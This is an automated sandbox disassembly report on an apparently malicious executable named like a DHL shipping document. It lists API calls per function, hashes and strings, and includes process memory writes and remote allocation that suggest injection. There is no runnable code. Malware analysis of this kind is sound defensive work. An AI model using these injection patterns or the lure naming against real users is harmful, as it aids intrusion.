                                                                                      • Instruction ID: 4b74a72b5b0a3a44284cb3e3babd4666b4ac1d631d0bf94680e0be561d2c19b8
                                                                                      • Opcode Fuzzy Hash: e6922128a5e58fcff0392489a52fa0c40c74477e9c86b5584bb9deb7ca664d60
                                                                                      • Instruction Fuzzy Hash: 92011231500B08AFFB215B11DD8FFA6BBB8BB04B05F142559A587B14E1DBF4A9888F90
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00DD22BE
                                                                                        • Part of subcall function 00DD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000), ref: 00DD29DE
                                                                                        • Part of subcall function 00DD29C8: GetLastError.KERNEL32(00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000,00000000), ref: 00DD29F0
                                                                                      • _free.LIBCMT ref: 00DD22D0
                                                                                      • _free.LIBCMT ref: 00DD22E3
                                                                                      • _free.LIBCMT ref: 00DD22F4
                                                                                      • _free.LIBCMT ref: 00DD2305
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 593d45559541e6d2af7cc4ed875733145e0db2445c7d0bc04444a9162c0b20c7
                                                                                      • Instruction ID: 136f8b763ba76d0b3e20dec52a0fb91d03ec9b8cc3e92926eb5a5adfa39d0c29
                                                                                      • Opcode Fuzzy Hash: 593d45559541e6d2af7cc4ed875733145e0db2445c7d0bc04444a9162c0b20c7
                                                                                      • Instruction Fuzzy Hash: 29F030705402518F8626EF6ABC118293B64F7287907140547F418F3372CB701499BFB4
                                                                                      APIs
                                                                                      • EndPath.GDI32(?), ref: 00DB95D4
                                                                                      • StrokeAndFillPath.GDI32(?,?,00DF71F7,00000000,?,?,?), ref: 00DB95F0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00DB9603
                                                                                      • DeleteObject.GDI32 ref: 00DB9616
                                                                                      • StrokePath.GDI32(?), ref: 00DB9631
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                      • String ID:
                                                                                      • API String ID: 2625713937-0
                                                                                      • Opcode ID: 254bac3e6d00f560783a56b66c120634b6512a038ca75cd7d78be32a0ce2d4e1
                                                                                      • Instruction ID: 1dfb0c871d18428030214abc4cd9499c82951f64f16ea7af83471fadfca31fed
                                                                                      • Opcode Fuzzy Hash: 254bac3e6d00f560783a56b66c120634b6512a038ca75cd7d78be32a0ce2d4e1
                                                                                      • Instruction Fuzzy Hash: 6FF0E131006348DFD7269F5AED1C7A47F65A741362F148254F65A750F4C730859ADF20
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$_free
                                                                                      • String ID: a/p$am/pm
                                                                                      • API String ID: 3432400110-3206640213
                                                                                      • Opcode ID: 84ebb722e8f51818743f0e0d5eeae2982674ae62ca6ad54d9b4d1147ab4dca9f
                                                                                      • Instruction ID: 151b4d08802d03a53f485a95a3d165581539d01239e1eea075cae488b9743d85
                                                                                      • Opcode Fuzzy Hash: 84ebb722e8f51818743f0e0d5eeae2982674ae62ca6ad54d9b4d1147ab4dca9f
                                                                                      • Instruction Fuzzy Hash: 28D1E239900206EADB289F68C855BFEBBB1EF05300F28425BE945AB751D3759D80CBB1
                                                                                      APIs
                                                                                        • Part of subcall function 00DC0242: EnterCriticalSection.KERNEL32(00E7070C,00E71884,?,?,00DB198B,00E72518,?,?,?,00DA12F9,00000000), ref: 00DC024D
                                                                                        • Part of subcall function 00DC0242: LeaveCriticalSection.KERNEL32(00E7070C,?,00DB198B,00E72518,?,?,?,00DA12F9,00000000), ref: 00DC028A
                                                                                        • Part of subcall function 00DC00A3: __onexit.LIBCMT ref: 00DC00A9
                                                                                      • __Init_thread_footer.LIBCMT ref: 00E26238
                                                                                        • Part of subcall function 00DC01F8: EnterCriticalSection.KERNEL32(00E7070C,?,?,00DB8747,00E72514), ref: 00DC0202
                                                                                        • Part of subcall function 00DC01F8: LeaveCriticalSection.KERNEL32(00E7070C,?,00DB8747,00E72514), ref: 00DC0235
                                                                                        • Part of subcall function 00E1359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00E135E4
                                                                                        • Part of subcall function 00E1359C: LoadStringW.USER32(00E72390,?,00000FFF,?), ref: 00E1360A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                      • String ID: x#$x#$x#
                                                                                      • API String ID: 1072379062-1894725482
                                                                                      • Opcode ID: 2fdc9a9958ca5ebafd7a474900314bff6b4836315a40707529f47dd18e2b8fae
                                                                                      • Instruction ID: 5c120cda34739a834585abb3c63a6d16a323b7655ca0bd32114ee0349247affd
                                                                                      • Opcode Fuzzy Hash: 2fdc9a9958ca5ebafd7a474900314bff6b4836315a40707529f47dd18e2b8fae
                                                                                      • Instruction Fuzzy Hash: DDC19B71A00115AFCB14EF98D891EBEB7B9FF48304F148169F955AB291DB70ED44CBA0
                                                                                      APIs
                                                                                        • Part of subcall function 00DC0242: EnterCriticalSection.KERNEL32(00E7070C,00E71884,?,?,00DB198B,00E72518,?,?,?,00DA12F9,00000000), ref: 00DC024D
                                                                                        • Part of subcall function 00DC0242: LeaveCriticalSection.KERNEL32(00E7070C,?,00DB198B,00E72518,?,?,?,00DA12F9,00000000), ref: 00DC028A
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                        • Part of subcall function 00DC00A3: __onexit.LIBCMT ref: 00DC00A9
                                                                                      • __Init_thread_footer.LIBCMT ref: 00E27BFB
                                                                                        • Part of subcall function 00DC01F8: EnterCriticalSection.KERNEL32(00E7070C,?,?,00DB8747,00E72514), ref: 00DC0202
                                                                                        • Part of subcall function 00DC01F8: LeaveCriticalSection.KERNEL32(00E7070C,?,00DB8747,00E72514), ref: 00DC0235
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                                      • API String ID: 535116098-3733170431
                                                                                      • Opcode ID: cf512c9ce05699c284012ab135ac5990f3cc04aaf45462ff3d628b988fee4ab9
                                                                                      • Instruction ID: 75247ed2c4821a2ff7860a8b132279beab605ad896ba9cbad0a775626928b1b1
                                                                                      • Opcode Fuzzy Hash: cf512c9ce05699c284012ab135ac5990f3cc04aaf45462ff3d628b988fee4ab9
                                                                                      • Instruction Fuzzy Hash: 72918C70A04219EFCB14EF64E891DADB7B1FF49304F149059F886BB292DB71AE41CB61
                                                                                      APIs
                                                                                        • Part of subcall function 00E0B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E021D0,?,?,00000034,00000800,?,00000034), ref: 00E0B42D
                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E02760
                                                                                        • Part of subcall function 00E0B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00E0B3F8
                                                                                        • Part of subcall function 00E0B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00E0B355
                                                                                        • Part of subcall function 00E0B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E02194,00000034,?,?,00001004,00000000,00000000), ref: 00E0B365
                                                                                        • Part of subcall function 00E0B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E02194,00000034,?,?,00001004,00000000,00000000), ref: 00E0B37B
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E027CD
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E0281A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                      • String ID: @
                                                                                      • API String ID: 4150878124-2766056989
                                                                                      • Opcode ID: ca8e701e8dfc63cd08178f51512a6146ec3ee143a8b05eaba3618a5fb7208535
                                                                                      • Instruction ID: 6cd08ce020800c2dc9ea5ccd26da4dd1b8af8311952e0eeb597900cf8d07cb4c
                                                                                      • Opcode Fuzzy Hash: ca8e701e8dfc63cd08178f51512a6146ec3ee143a8b05eaba3618a5fb7208535
                                                                                      • Instruction Fuzzy Hash: F8412E76900218AFDB10DFA4CD46BEEBBB8EF09700F109059FA55B7181DB706E85CBA1
                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL 073412182024.exe,00000104), ref: 00DD1769
                                                                                      • _free.LIBCMT ref: 00DD1834
                                                                                      • _free.LIBCMT ref: 00DD183E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$FileModuleName
                                                                                      • String ID: C:\Users\user\Desktop\DHL 073412182024.exe
                                                                                      • API String ID: 2506810119-1558037091
                                                                                      • Opcode ID: a581094b41d92fc26d9d66eae031fff341c4350797deb008ac02423571412f35
                                                                                      • Instruction ID: 37fcba78382f4e148cb485a4ce0ef7a77e6605ced483fc5cd4b0e2981176aecc
                                                                                      • Opcode Fuzzy Hash: a581094b41d92fc26d9d66eae031fff341c4350797deb008ac02423571412f35
                                                                                      • Instruction Fuzzy Hash: F9317E79A40259FFDB21DB999885D9EBBBCEB85310B1441A7F404E7321D7708A44DBB0
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E0C306
                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00E0C34C
                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E71990,00FC5D10), ref: 00E0C395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                      • String ID: 0
                                                                                      • API String ID: 135850232-4108050209
                                                                                      • Opcode ID: 5b18b7d1c5ab5dcf52b8032b5534ae14adfd8248fd49102185b7e53955985f67
                                                                                      • Instruction ID: 5cfa56168d0e0d1c4c2ac867909fe1e0e79553945184be18fef96116dea768d2
                                                                                      • Opcode Fuzzy Hash: 5b18b7d1c5ab5dcf52b8032b5534ae14adfd8248fd49102185b7e53955985f67
                                                                                      • Instruction Fuzzy Hash: 0541AE712043019FD720DF25D884B5ABBE4EF85324F209B6DF8A5A72D1D734E984CB62
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E3CC08,00000000,?,?,?,?), ref: 00E344AA
                                                                                      • GetWindowLongW.USER32 ref: 00E344C7
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E344D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID: SysTreeView32
                                                                                      • API String ID: 847901565-1698111956
                                                                                      • Opcode ID: b891c038bf14318f1acb343c17ed2232527edbd27bdf425e248c05c511c77168
                                                                                      • Instruction ID: 0b22f185a6288aa06c31f32b9bd8eb1b1a8e63d8cb166a4ee05e25e347753582
                                                                                      • Opcode Fuzzy Hash: b891c038bf14318f1acb343c17ed2232527edbd27bdf425e248c05c511c77168
                                                                                      • Instruction Fuzzy Hash: 41318D72210205AFDB219E38DC49BEA7BA9EB09338F205725F975B21D0D770EC50D760
                                                                                      APIs
                                                                                      • SysReAllocString.OLEAUT32(?,?), ref: 00E06EED
                                                                                      • VariantCopyInd.OLEAUT32(?,?), ref: 00E06F08
                                                                                      • VariantClear.OLEAUT32(?), ref: 00E06F12
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$AllocClearCopyString
                                                                                      • String ID: *j
                                                                                      • API String ID: 2173805711-1845181700
                                                                                      • Opcode ID: b27aacdd79d6a80efa2ce9a4c3df8c28d7f7fe6e86c3dbacb5dfc2c91e7bfff7
                                                                                      • Instruction ID: e183d1469a3e75c743b5ceb2118a3c5616b4dfd83c34e22d49dc4ac63d1d0d43
                                                                                      • Opcode Fuzzy Hash: b27aacdd79d6a80efa2ce9a4c3df8c28d7f7fe6e86c3dbacb5dfc2c91e7bfff7
                                                                                      • Instruction Fuzzy Hash: B931A272704246DFCB05AFA4E851ABD37B6FF85714B1004A9F9126B2E2C7349962DBF0
                                                                                      APIs
                                                                                        • Part of subcall function 00E2335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00E23077,?,?), ref: 00E23378
                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E2307A
                                                                                      • _wcslen.LIBCMT ref: 00E2309B
                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00E23106
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                      • String ID: 255.255.255.255
                                                                                      • API String ID: 946324512-2422070025
                                                                                      • Opcode ID: 81e6c644fb3d8a87dfeda7cee8cfd43bb283a225411b55c859c88a1c2b6fd1fe
                                                                                      • Instruction ID: 41be152fec56d30ff42831aa398765481d1089fe7788c6417600d8ab3aef5771
                                                                                      • Opcode Fuzzy Hash: 81e6c644fb3d8a87dfeda7cee8cfd43bb283a225411b55c859c88a1c2b6fd1fe
                                                                                      • Instruction Fuzzy Hash: C631D5352002259FC720CF78D486EAA77E0EF55318F249059E915AB392DB79EF45CB70
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E34705
                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E34713
                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E3471A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                      • String ID: msctls_updown32
                                                                                      • API String ID: 4014797782-2298589950
                                                                                      • Opcode ID: 6d1bc261b36bf98df9d89814abd758fc45e4a4555c622fe984068588466855ad
                                                                                      • Instruction ID: 88249291f620406064228656d32be7f2b400a98018485711b081e68680294bc8
                                                                                      • Opcode Fuzzy Hash: 6d1bc261b36bf98df9d89814abd758fc45e4a4555c622fe984068588466855ad
                                                                                      • Instruction Fuzzy Hash: B8215EF5600209AFDB10DF69DC85DA73BADEB8A398F141059FA04AB291CB70FC51CA70
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                      • API String ID: 176396367-2734436370
                                                                                      • Opcode ID: c35cab3a46ab6d951b1f45df8b0f3f7392cedf8a246bef8812822e09cd54fb50
                                                                                      • Instruction ID: d65509e8d917ae15854f0f8cefbc599fdb900e22a4ead29ccb85c40b34e7c9b2
                                                                                      • Opcode Fuzzy Hash: c35cab3a46ab6d951b1f45df8b0f3f7392cedf8a246bef8812822e09cd54fb50
                                                                                      • Instruction Fuzzy Hash: 6521087210461166D331AF25AC06FB77398DF55314F14502AF949B71C3EB529D81D2B5
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E33840
                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E33850
                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E33876
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MoveWindow
                                                                                      • String ID: Listbox
                                                                                      • API String ID: 3315199576-2633736733
                                                                                      • Opcode ID: 1234579d9814f200271d2880c555b9b8556a9e063744a844dffc2f9956659e68
                                                                                      • Instruction ID: 44ae0c8c0e039e5e647e023ee42fffa5fe0e6b26e35695b6a2fcdc94c0ec4842
                                                                                      • Opcode Fuzzy Hash: 1234579d9814f200271d2880c555b9b8556a9e063744a844dffc2f9956659e68
                                                                                      • Instruction Fuzzy Hash: 9121B072610218BBEB218F65DC49EAB3B6AEF89754F119115F904AB190C671DC52C7A0
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E14A08
                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E14A5C
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00E3CC08), ref: 00E14AD0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
